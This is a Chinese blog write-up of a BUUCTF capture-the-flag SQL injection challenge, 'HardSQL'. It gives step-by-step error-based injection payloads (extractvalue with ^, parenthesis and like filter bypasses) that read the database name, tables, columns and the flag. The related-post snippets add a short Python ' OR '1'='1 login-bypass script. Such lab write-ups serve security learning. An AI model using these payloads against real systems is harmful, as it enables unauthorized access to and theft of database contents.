BUUCTF-[极客大挑战 2019]HardSQL 1

最新推荐文章于 2025-04-15 22:27:34 发布
最新推荐文章于 2025-04-15 22:27:34 发布
阅读量1.4k 收藏 2
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xixihahawuwu/article/details/113057702
版权

SQL注入 数据库安全 信息泄露 错误注入 Web安全
关键词由优快云通过智能技术生成

在这里插入图片描述
检查页面元素
在这里插入图片描述

在这里插入图片描述
用get的方式请求两个参数username和password
利用hackbar工具
用户名和密码随便构造
在这里插入图片描述
在密码处尝试注入
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
发现单引号会报错,而双引号则不会,应该是普通单引号闭合的字符型注入点
在这里插入图片描述尝试注入,发现对sql语句有过滤,并且存在着URL转码
在这里插入图片描述
union及select等函数同样被过滤
利用报错注入

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23

在这里插入图片描述
得到数据库名

username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

语句使用()绕过了空格,用like绕过了=号

在这里插入图片描述

username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

在这里插入图片描述

check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))))%23

在这里插入图片描述
flag{166bdf3a-64d3-4b24-9fa3-ae
利用right函数获取剩下的flag

check.php?username=admin&password=admin'^extractvalue(1,right(concat(0x7e,(select(group_concat(password))from(H4rDsq1))),20))%23

在这里插入图片描述
拼接的到flag{166bdf3a-64d3-4b24-9fa3-ae3cb68dbada}

[原题复现][极客挑战 2019]HardSQL(update报错注入)
笑花大王
02-15 3026
简介 原题复现: 考察知识点:SQL注入(报错注入,绕过过滤) 线上平台:https://buuoj.cn(北京联合学公开的CTF平台 特别感谢!) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 复现 经过手工测试过滤了and、= 空格 union等多个sql关键字 要思考如何绕过这些关键字去注入! 使用updatexml报错法注入 查数据库信息 http://1bfb...
极客挑战2019Hardsql
uuzfumo的博客
11-06 463
SQL注入报错注入类型的相关题目,涉及一部分的绕过知识
BUUCTF闯关日记--[极客挑战 2019]HardSQL1
qq_64201116的博客
05-17 599
以后遇到sql注入,我觉得应该先判断他过滤了什么东西,比如比较重要的 第一个:空格 第二个:and,or,select,#,--+ 第三个:'(单引号)和"(双引号) 第四个:注入使用的函数(可以挑你比较喜欢的顺手的或者简单的函数优先): sleep,if(布尔盲注) updatexml,concat(报错注入) order by,union(显错注入) load_file(DNS注入) 当然了还有一些database()等等,把你要走的路先测试一遍再进行渗透 否则你走到最
BUUCTF [极客挑战 2019] HardSQL 1
最新发布
duchuan_的博客
04-15 430
初始页面。
web buuctf [极客挑战 2019]HardSQL1
weixin_44214568的博客
03-15 2144
这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
[极客挑战 2019]HardSQL 1
qq_43618536的博客
07-03 692
BUUCTF的[极客挑战 2019]HardSQL 1
BUUCTF——[极客挑战 2019]HardSQL
doraemon12345的博客
06-01 333
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
BUUCTF-WEB
ccfly1012的博客
11-02 4073
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF-web刷题记录-2
qq_45628145的博客
07-27 516
[极客挑战 2019]HardSQL 一个登陆框,简单测试一下很多包括union等字符被过滤了,这里这样构造可以成功登录,但是没有flag,所以是要把flag从数据库读出来了 admin'Or(1)# 1 发现^没有被过滤,可以用来代替and,与extractvalue函数结合来尝试进行报错注入 这个函数在这里的致用法是这样的,extractvalue(null,concat(0x7e,user(),0x7e)),中间的user()即为你想执行的查询语句 接下来这题就是爆库,爆表,爆字段,爆内容的基本
2025.1.16——七、HardSQL 报错注入
2402_87387800的博客
01-17 934
题目来源:buuctf[极客挑战2-19]HardSQL
BUUCTF Writeup-Web-[极客挑战 2019]HardSQL 1
菜鸟之路
07-17 3824
BUUCTF WriteUp Web [极客挑战 2019]HardSQL 1 打开后提示sql注入,查看页面源代码: 发现是get两个参数username和password到check.php 因此可以直接用hackbar构造……/check.php?username=aaa&password=aaa,并执行就可以了。用burpsuite直接改数据也行。 然后开始注入,尝试加’、" 发现单引号有报错,双引号没有,没提示有括号,所以应该是普通单引号闭合的字符型注入点 出现这行字说明输入的被过
Buuctf-Web-[极客挑战 2019]EasySQL1 代码
12-28
### Buuctf Web 极客挑战 2019 EasySQL1 解题代码 对于Buuctf Web中的极客挑战2019之EasySQL1,由于该题目存在未对输入参数进行适当过滤的情况,可以利用这一特性通过SQL注入的方式完成解题。下面展示的是基于此逻辑构建的攻击向量实现方式。 #### 使用Python脚本模拟请求并获取Flag ```python import requests url = "http://example.com/login" # 替换成实际地址 payload = { 'username': "' OR '1'='1", 'password': "' OR '1'='1" } response = requests.post(url, data=payload) if "flag{" in response.text: start_index = response.text.find("flag{") end_index = response.text.find('}', start_index) + 1 flag = response.text[start_index:end_index] print(f"The obtained flag is: {flag}") else: print("Failed to obtain the flag.") ``` 上述代码展示了如何构造一个简单的POST请求来发送含有SQL注入语句的数据包给目标网站,并从中提取返回页面内的`flag`字符串[^1]。 需要注意的是,在真实环境中应当合法合规地参与CTF竞赛活动,不得用于非法目的或损害他人利益的行为上。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一名无聊的网友

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值